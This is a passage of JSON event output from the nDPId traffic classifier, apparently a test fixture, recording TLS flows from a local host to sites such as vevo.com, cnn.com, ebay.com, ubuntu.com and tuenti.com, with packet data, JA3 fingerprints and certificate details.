+01479{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":348,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4125,"flow_avg_l4_payload_len":687,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"vevo.com","server_names":"*.cache.vevo.com,*.cache.vevodev.com,*.cache.vevoprd.com,*.cache.vevostg.com,*.vevodev.com,*.vevoprd.com,*.vevostg.com,stg.vevo.ly,vevo.com,vevo.ly,vevo.pl,vevo.tv,vevoapi.com,vevocdn.com,vevolive.tv,vevosubmit.com,www.vevo.ly,www.vevo.pl,*.vevo.com,*.vevo.ly,*.vevo.pl,*.vevo.tv,*.vevoapi.com,*.vevocdn.com,*.vevolive.tv,*.vevosubmit.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.cache.vevo.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"ED:55:58:0E:19:94:FE:95:93:86:88:FE:30:27:DF:43:EB:74:17:C2"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482753482,"flow_last_seen":1646482753482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482753482,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1646482753482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482753482,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8SaBAAEAG1aPAqAGAFwFCT7wMAbtaGHg4AAAAAKAC+vA\/9AAAAgQFtAQCCAr10Gu5AAAAAAEDAwc="} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1646482753504,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482753504,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJkQXAUJPwKgBgAG7vAwZG5KKWhh4OaAS\/ogYMwAAAgQFtAQCCApuzQml9dBruQEDAwc="} +01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1646482753507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482753507,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5SaJAAEAG06TAqAGAFwFCT7wMAbtaGHg5GRuSi4AYAfZqJAAAAQEICvXQa9NuzQmlFgMBAgABAAH8AwOUyHhinsfe9G2IXNgY9L7xAzZ+DjB199btap4Cw89cViDuti6QLvXTxzS8GPAI\/LqrruRicKAVDOLPOdfZnGvHHQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtjZG4uY25uLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCyATmKdF69bnRwMVBRd98tu612XdMkfb0+p4HzFN6fBwAXAEEE+SEvSVfUiTeIP8IKKsjphsMZuVwTWztloapho\/r89Lhgv68xO7BDbwW8nmN\/dVf8z\/v3pQVdFakWyi7cuNIpiwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
+00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482753482,"flow_last_seen":1646482753507,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482753507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482753526,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482759960,"flow_last_seen":1646482759960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482759960,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1646482759960,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482759960,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8N8NAAEAGsY7AqAGAAhGNMZ+AAbsz0CpkAAAAAKAC+vAbqAAAAgQFtAQCCApTrIzgAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1646482759979,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482759979,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8VECEY0xwKgBgAG7n4Axx0rTM9AqZaAS\/ogIXwAAAgQFtAQCCAq1xN1AU6yM4AEDAwc="} 
+01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1646482759982,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482759982,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5N8VAAEAGr4\/AqAGAAhGNMZ+AAbsz0CplMcdK1IAYAfb4fgAAAQEIClOsjPe1xN1AFgMBAgABAAH8AwO90p\/YrOJd\/Z4tss7jqktThIJxJIB3e+qrLLFobtKKlyAX6YhgDO5LSOYTxZN2IGu+QsQ1WdlQy7VgjD2lE+VvBgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAx3d3cuZWJheS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgf8Mv24G6SSqxNEfrqm7W\/bejLWA6OGSZmHTWefPpxiwAFwBBBD+GtRBdEP9fCUeld\/IGhJTQe0q9+sY1uU3D5mNCoqM6EROqE0XBEIsVt1XPe0XwL5d6JRvhBZsY2OXTwlPA9KoAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482759960,"flow_last_seen":1646482759982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482759982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":358,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482760002,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482772264,"flow_last_seen":1646482772264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482772264,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1646482772264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482772264,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8SfdAAEAGtwnAqAGAuX2+FaeEAbviQ3M+AAAAAKAC+vAD2AAAAgQFtAQCCAo3btlLAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1646482772292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482772292,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADcGCgG5fb4VwKgBgAG7p4RVAzgX4kNzP6AS\/ogvJwAAAgQFtAQCCAoh0SIcN27ZSwEDAwc="} +01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1646482772294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482772294,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5SflAAEAGtQrAqAGAuX2+FaeEAbviQ3M\/VQM4GIAYAfaY1QAAAQEICjdu2Woh0SIcFgMBAgABAAH8AwMB8bRCQdqcx9fui+mF7VjuHN5SBb79arjGU4qYGthMOSBbTABCg135wJeFEPl+a8Oxzav9AsC9J9+l+IIaNAxYkQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFhc3NldHMudWJ1bnR1LmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCezVQBlUDf2SIx8m1xehLWY9pQKyvfH068Wwzre\/JcNwAXAEEEo09VNt2RkHEqlhHBw1nk6JbOlFIOJqgyxElu\/vwC+3XCJEwr43v+9rwXwcTyZXa+qtiIur9f6O0kVe2u0AJzEQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482772264,"flow_last_seen":1646482772294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482772294,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482772325,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482785304,"flow_last_seen":1646482785304,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482785304,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1646482785304,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482785304,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8c2NAAEAG\/FHAqAGAX4OpW8gwAbszoGaBAAAAAKAC+vB9ogAAAgQFtAQCCArCJt4xAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1646482785347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482785347,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADIGfbVfg6lbwKgBgAG7yDD0fDnYM6BmgqASOJCOBAAAAgQFtAQCCAoi\/WCZwibeMQEDAwk="} 
+01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1646482785351,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482785351,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5c2VAAEAG+lLAqAGAX4OpW8gwAbszoGaC9Hw52YAYAfYZoQAAAQEICsIm3l8i\/WCZFgMBAgABAAH8AwNK0euZMFtaCNBtu+eL8QS+C1QwW1wzikaweB9ZeLN7jCCkdWD5KYTe5rYj3sVQQUUDDmKS7Ul8Bkz8dJPsZBeSHgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAPAA0AAAp0dWVudGkuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIJK5tprzoOfSjZ23KXMf08y5udMKZfRYOXHDalLyYQBZABcAQQRLZU+TiBidby\/7mJhjeaCEAZfIl\/ESg4w9XgdOmdSs6KJ9\/6C1zE6e09432pgZPLx5qZNVUeHl8Lum72bGeXBPACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482785304,"flow_last_seen":1646482785351,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482785351,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482786097,"flow_last_seen":1646482786097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482786097,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1646482786097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482786097,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8MYNAAEAGPTLAqAGAX4OqW5mGAbs4G85LAAAAAKAC+vAJ+AAAAgQFtAQCCApUK4E8AAAAAAEDAwc="} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1646482786139,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482786139,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADEGfbVfg6pbwKgBgAG7mYaAJv+vOBvOTKASOJA3NAAAAgQFtAQCCAojEPIqVCuBPAEDAwk="} +01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1646482786140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482786140,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5MYVAAEAGOzPAqAGAX4OqW5mGAbs4G85MgCb\/sIAYAfY7ugAAAQEIClQrgWcjEPIqFgMBAgABAAH8AwPCuINo9aszS1NOKEJoT\/qcXc1z2+SkMYjVWEN9Dzm1uCAc1Fe\/tF+S3TB+puhQn5k1kl\/SrZE1Zu7DG17b6iPYkAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFzdGF0aWMudHVlbnRpLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAO0kbEPJvFV01Owk3nxVpBPAsVRMhGqyVHONxZeCXXCAAXAEEEdYt+qtkVgPe4ucZXkNkiZFAQTN50kMr6BFmQ8vGiT4E\/aWy5wxXrEUez6C+lutJauRk\/zdA9y71YXWyeYxHbNwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA